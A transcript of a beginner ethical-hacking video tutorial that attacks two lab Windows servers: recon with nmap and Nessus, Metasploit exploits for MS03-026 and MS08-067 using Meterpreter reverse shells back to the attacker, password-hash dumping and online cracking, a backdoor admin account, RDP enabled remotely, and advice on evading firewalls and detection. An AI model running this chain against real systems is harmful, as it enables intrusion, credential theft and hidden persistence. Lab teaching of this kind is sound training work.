Hi again, still on the same topic, the Ethical Hacking Practical tutorial series for beginners. Now previously I have mentioned and I was talking about exploitation, step number 7. Then I found out that this exploitation is only applicable to, the exploitation techniques are applicable to Linux. So I will just put Linux, because what we're going to do is here we'll discuss, or I will explain about how to do the exploitation on Windows. So for the lab, or for the tutorial, I'm going to use the Windows Server, customized Windows Server named DenWeb1, which is normally stands for the Denver Web Server 1 and Windows Server 2003, with the name of DenWeb2, Denver Web Server. And if you ask about how do I get the Windows, of course, Microsoft website. You can download the ISO file if you have the MSDN subscription, or you can find somewhere on the internet, right? So the tool we're going to use is this Metasploit Framework, just to simplify everything. Okay, so let me show you my Kali. Yeah, so I have Kali running. I have DenWeb1 and DenWeb2. Okay, so first, because I've already customized the servers running on a specific IP addresses, so let's set the IP address on your Kali. So use the command ifconfig et80, then the address range is 131.107.1. So you can put any IP like 252. This is my favorite IP for my Kali. And I remember that we need to set something on this Kali Linux to allow communication, local communication between the hosts. Let me check. Let me see the cat ipconfig. So you need to add IP route here. Yeah, so copy this one and then paste it. Yeah, it's already there. And let me just try to do the Nbtstat just to quickly find my target addresses or target hosts. I just put like Nbtstat -r 131.107.1.0/24. Oops, sorry. Let me run it again. -r. Oh, sorry again. nbtscan -r. So I was running the wrong one. Let me just. Yes. So notice that I have DenWeb1 and DenWeb2. So 101 and 254. So I got 101 here and 254 for the DenWeb2, right? Okay, so let's repeat the some of the commands or some of the tools we were using for the Reconnaissance. So let's try this. Nmap. Then you put the -n or -n to skip the domain resolution. -ss minus, let's say, or -a. And you could actually ask for the the version number. So you can put like -sv. Oh, I think A is already there. So you just need to put minus or -d address. So you want to run this. I forgot to mention that we need to set or create a target host. So we just call it as my host, so just put it as nano. You run this my host.txt, and you put 131.107.1.101 and 131.107.1.254. Press Ctrl X, press Y, and enter. Now I will do the scanning using nmap minus n minus ss minus a, then minus il. Then you can put like the my host.txt and put the output with XML file. For example, ox, let's say my host.xml. Now this XML is this XML output file will be very useful for our next what do you call this, lab, or our next step. Yeah. So let's run this, and if you want, you can also try to scan for vulnerabilities by putting the -- script vuln. I hope you still remember this command. Yeah, I think I was putting the wrong. Yeah, it's supposed to be after this one, so you can put like -- script vuln. Yeah, that's it. So this is our command. Yeah, complete command is like this. Okay, so you have to wait for a while and find the result. Then after that, take advantage of the result by doing the exploitation. Yeah. Okay, let's revisit the result. So I got the result already. Yeah, a lot of vulnerabilities being found. Yeah, so just to repeat, these was the command I have issued. And yeah, let's try another tool to detect vulnerabilities. Just run let's run Nessus service Nessus the start. This command is actually to start our Nessus scanner, and I will need to open the browser to access the Nessus client. So let's check 127. Yeah, this is Nessus if I'm not mistaken. Sorry, it's supposed to be localhost. Yeah, 8834. That's the port. Wait for a while. Initialization is in progress. So perhaps you still remember that we could also use Nessus, Tenable Nessus, to actually scan for or to look for vulnerabilities. But the only problem is that Nessus is not free. Yes, they have a free edition, but it's only limited to 16 hosts per scan. Okay, so while waiting for Nessus, let's check our result. Yeah, and let's just verify the scanning result stored in my host.xml. So let's just type ls minus la my host star. We got my host.txt, which is my input, and my host.xml, which is the output. Okay. And yeah, so let me just unlock it. Okay, so still initialization or initializing. Try to sign in, and let's see. Let's see what we have. Okay, so we got vulnerabilities. Okay, so here is my scanning result of the 101. I don't have to really scan, rescan. So I can find that 101. This was actually based on my previous scan that I did for the lab. So to speed up, so I found the result of 101 and 154. So notice that you can also see a lot of vulnerabilities here. Yeah. So still, if you still want to scan, of course you can always launch the scan or create a new scan. Like for example, here I'll create new scan. I will put like or I will select basic network scan, and I put a name like not really clear enough, my host, and you can put a target which can be from the file. So just go to root, and we found myhost.txt and select launch. Yeah. So this is my scan. Now the result, the scanning result from this Nessus, whether it's a home edition or professional edition, can be exported so that we can use it later on in our next what do you call this session or next step. And while the scan is running, you can already see that we found several vulnerabilities here. Okay, so let's try one of the vulnerability here, which is actually related to 101, which is actually Microsoft multiple issues. We got this MS06016 or sorry 18, and maybe I can refer to my previous scan. Here we found a lot of vulnerabilities here, and one of these vulnerabilities is this one. Let's look at the Microsoft multiple issues. Yeah, I am interested on this MS, the older one, Microsoft RPC. So this is our target. Okay, so let's fire up MSF console. And by the way, if you want to speed up the search process, here we found something like a no database. So we might want to cancel this, exit. You can type msfdb initialize. Oops. Yeah. To initialize the Metasploit Framework database. So let's relaunch this MSF console. Yeah, so we got this one. So let's try. First, let's clear the screen. Type search. Our target is MS03, right? So you can search by using this search MS03. And we got one here, exploit Windows DC RPC MS03026 DCOM. So we can copy this one and then type info, paste the exploit module name, and you can see the information. So it's actually exploit MS03. This is what we're looking for. Okay, so what we need to do is we need to specify the R host. We don't even need to change the R port because this is the default one. So let's try. Clear screen, use, then paste, and you can even type let's say show payloads. In fact, there are many payloads, so what we can do is I'll just select, let's say set payload, let's say Windows Metasploit, because our target is Windows. We know it exactly. Metasploit reverse TCP. Okay, a reverse TCP means that I mean the payload of Windows Metasploit reverse TCP is the payload that will actually allows you to connect back to Kali Linux as your host machine to do the hacking, right? So reverse TCP means you're calling back to your Kali Linux as your local host. So after this, you just type show options, and you can see that we need to input this, we need to input this, and you can also change this. So let's try set our host. Yeah, you can put like the entire range, like 131.107.1.0/24, but it will take a while because we're actually launching the attack against multiple hosts. To speed up, you can just put the target host, like for example 101, and you can specify the L host, set L host, which is your IP address, which is referring to your own IP, your Kali Linux IP 252 in this case. And you can modify the L port so that it might, you know, what do you call this, be allowed by the firewall, because we're not trying to trigger the alarm. So try this one, set L port 443, meaning that my Kali Linux will listen to the connection from the remote host if the exploit was successful. Okay, so then you can check, type exploit. Yeah, this is the command to launch the exploit. And within a few seconds, we got this sending stage. This is actually sending the payload. The size of the payload is about 179.779 bytes. Yeah, to this target, which is then web 1, and we got Metasploit open. Okay, so this one. Now, how do I know that I'm already inside the target machine? You can just type sys, supposed to be help. You can type help just to see, because Metasploit support a lot of different commands. So I can just type, let's say, sys info to get more information. See this one, you're in then web 1, and it's Windows 2000. And you can even type ipconfig instead of ifconfig to see the IP address, whether it's K3 correct or not. And we can do basically a lot of things here, as you can see from the. So for example, let's try hash dump. This will dump the content from the SAM database, hash dump. That's it. And if you want to know the real password, what you can do is you can just copy this. You can, yeah. Then let's say open your browser and go to, let's say, hashkiller.co.uk and go to let's say, because definitely the hashes, the dump hashes are the NTLM, so you just need to paste it, and then select check my hashes. Yeah, and notice that we got the, this is automatic, is an automatic detect, automatically detected as NTLM, and the password is password. As easy as that. Or you can also use this crack station.net and paste the hash. Yeah, this will be automatically detected, the hash, you don't have to worry, and then click crack hashes, and we got the same password. Yeah, so that's why I personally like to collect all of this and store it somewhere. And you could also try to access the command, what do you call this, command prompt or the shell on Windows by typing shell. If you receive this this error, fail to spawn shell with threat impersonation, yeah, what you can do is you can type execute, yeah, minus, let's say, h to see the options. So let's try execute minus h to create a process hidden from the view, minus I, minus f. I means interact with the process after creating it, minus f is the file that you want to execute, and that's it. We are executing the command prompt or the command shell to spawn the shell, and then we got this cwin_nt. All right, so let's see. If you want to go back, you can just maybe type like exit, yeah. Or if you want, you can also create something like, let's try something like for example, let's create a user account, a local user account. You can just use the command net user, let's say hacker, and then you can put the password, let's say p@ssw0rd and /add. Okay, this command was successful. Now we will add the hacker as the member of local admin group. So you can just type net local group administrators, and then you add the hacker /add, and bingo. And with this, you can actually launch, let's say, new window or desktop. Try to connect to the remote desktop session or the service 131.107.1.101. I was unable to connect, maybe because remote desktop is not enabled on the, or was not enabled on the target hosts. Yeah, just leave it like that, it's okay. Maybe we can try to see if we have, let's try net user, and notice that we got hacker as the user created, and we have other users as well, administrator, Denver admin, John, task user, and so on. Yeah, okay, so when you want to go back to the Metasploit, all you need to do is control, you can type exit if I'm not mistaken, or control Z. Yeah, then you can type help again to see other commands. Okay, so a lot of commands can be executed here, yeah, because Metasploit is a very smart and what do you call this, featured rich payload. Alright, so that's an example of exploiting one what do you call this, one host, let's say then web 1 in this case, with the IP address of 131.1.0 107.1.101. Okay, so what if I want to also use this to actually exploit my other targets? Like, let's see, can go back and see the scanning result. Okay, my host, I think, is done, and we found 14 vulnerabilities related to this host, which is 131.107.1.254. And let's look at multiple issues. Here I can also use this RPC, or even try something else, like, for example, yeah, this one, MS08067. Okay, let's try. So same thing, let's go back to this one. You can type exit, you don't have to okay, so let's try, maybe just open a new window, shell, and launch MSF console, maximize it, then search for MS08. So search MS08, and we found this net API. Yeah, we can type info, then paste this one. We get what information telling about the exploit module, which is actually Microsoft Server Service Relative Path Stack Corruption, and it has several available targets. Yeah, so let's try. Use, then paste this. Supposed to be the module name. Let's copy again. So this one, copy and paste it, and then let's set the same payload, like set payload Windows Metasploit reverse. This is my favorite payload. Show options, then you set our host, put the host itself 131.107.1.254, and you might want to change the L host, of course, the set L host, which refers to our host, which is Kali, and set the L port. I'm also will use 443, and let's try exploit. Yeah, it says no session was created, maybe because it requires us to select. Okay, so let's try this one, Windows 2003 Surface Pack 0. How do I know this? You can actually check from the result of this vulnerability. Yeah, so you can actually see that this Microsoft Windows Server. Let's try. So let's set a target. Set target. Let's say 3 and type exploit. Says that connection refused. The connection was refused by the remote host. Let's see what happened to the remote host. So it looks like nothing much. So let's see. You can try to change the port. For example, set L port. Let's say 4444 exploit. Still the same problem. Maybe it's not our lucky day today. Let's go back and then search again other vulnerabilities. Let's say, let's do the same vulnerability. Exploit the same vulnerabilities, like MS03026. Yeah, maybe it will work. We don't know. Let's see. So clear, search MS03, just supposed to be MS03026. 3026, right? Okay, so let's just copy this. Of course, you can try a different exploit module, but in this example, I will be using the same one. Yeah, same payload. Yeah, so set payload Windows Metasploit reverse TCP, and you can type set L port 403, show options. Okay, then set L host as usual, IP address of Kali, and exploit. Oh, sorry, supposed to be R hosts. Yeah, so we need to set R hosts 31107.1.254 exploit. Wow, very fast. Yeah, so we got Metasploit open, and you can just confirm whether we are already inside the machine or not by typing sysinfo ipconfig, and we got denweb2, we got the IP address, which is actually the same, and we can of course do the hash dump as well. Yeah, you can do the cracking by copying this, as I have mentioned earlier, or you can create new user. Like, okay, let's try to spawn the shell. Bingo. Now we do not have any error. It's actually the same as launching the command prompt or command shell. Now let's create a new user, net user hacker PSSW0RD/add. Now add the user as the member of local admin, net local group administrators hacker/add net user to confirm, and let's try. We have created hacker with a password, so let's try this. New window or desktop 131.107.1.254. Well, we still have the error, unable to connect, but you know that Metasploit also has the module. Yeah, let's try exit, go back to Metasploit, help, see what we got. Let me see. I can in fact let's analyze this. I remember that there's a command, yeah, called let me see, because I remember there's one command that will allow you to enable, yeah, it's a run get GUI. See this one? Oh, sorry, not that one. So there's another external command. Let's try run get GUI, yeah, -h. So this is actually an external command or external script. It says that is deprecated, meaning that no longer available. So let's try this one. Run post Windows enable RDP. You can set the value. For example, let's say copy, paste. Then what are the options? We don't know. Let's just type help. Okay. Oh, -e. So enable RDP. Okay, done. RDP is enabled, enabling it, and you can actually clean up in case you want to clean up what you did on the host. Yeah, so you can actually use the cleanup resource here, and let's try again, and bingo, we got the remote desktop. And because you have already created hacker as the user, just type hacker and put a password that you have also created. And we have the full remote desktop on this particular target. Okay. Yeah, anyway, this is our DenWeb 2. We were able to get full access based on the remote desktop. Yeah. And I personally like to use this, although the use of remote desktop is not really recommended, because when you log on, it will actually kick off the user who currently log on to the machine. So somebody might know that you are actually trying to access remote desktop, because by default remote desktop is only allowed if you are the admin, and there are some limitations on accessing remote desktop on the server. Okay, so that's our result. And let me open up. Yeah, so you can enable the remote desktop by running this command, like run post windows. There are a lot of other post exploitation, what do you call this, script or modules. We will discuss that, those modules in our next session related to the post exploitation techniques. Right, so have a look at this one. And I like this hash dump because you could actually dump the SAM database, the content of the SAM database, and you could also do a lot of other things like screenshot. Yeah, so for example, if I want to do the screenshot, I can do a screenshot. Yeah, let's try one screenshot here. Screenshot, and by default it will be stored in this directory. You can just copy, and you can open up your Firefox, paste this one, and this is what you see. Yeah, and back to our scanning. Later on, you could actually use this, the result. So for example, this one, this is our result for the two hosts, 101 and 254, and you can actually export this to, let's say, Nessus. That will also be so by default, when you save this, it will be stored under this name. And you can actually use the this XML document result for other purposes. I'll discuss about that on our next session. Okay, so still remember, we got this remote desktop, and we also have the Metasploit. So to hide from detection, Metasploit uses, if I'm not mistaken, encryption, so that whatever you're doing or whatever we do in on the target machine will not be detected. Yeah, so we can only detect, or the admin can only detect that we entered the system or we gain the access, but the what do you call this, the processes as well as activities we are doing in Metasploit will not be detected. Yeah, of course you can actually try this by launching, for example, Wireshark, just to prove it. Yeah, Wireshark. Okay, and see what we have at the back. So for example here, and notice that there's a connection 3389 is already there. But if I close this, I can actually close this, and what you'll see is just normal one. Yeah, so everything you do, from here, like for example, hash dump, will not be detected. So it says SSL. See, all SSL, right? From 252 to 254, from 252 to 101. Yeah. So this is what I like. Yeah. So basically, you can look at the protocol being used. Yeah, here you can see that it's running SSL. Yeah, 252 to 254, 252 to 101. Yeah, and it's really nice, so you can hide yourself from the detection. All right, so that's how we actually do the exploitation. And remember that you can actually use Nessus as well as the Nmap result. Yeah. So I forgot to mention that you could actually convert this the XML, like for example, as my host star. You can convert the XML so that you can also read the result. If I'm not mistaken, I've already discussed this in my previous session. So let's try again. XSLT prop. This is actually the process of converting the XML to HTML. Oops. Minus O my host.html. You can launch the Firefox. My host.html. And bingo, we got this result. Okay, so we can see the vulnerabilities being displayed. Yeah. And very nice report. Of course, you can actually right click and print this one if you want. Yeah. So there's one option to print out this one, and you can see the report. Okay. So that's all for today, guys. I'll see you in my next lesson. Yeah. On the same series. Bye-bye.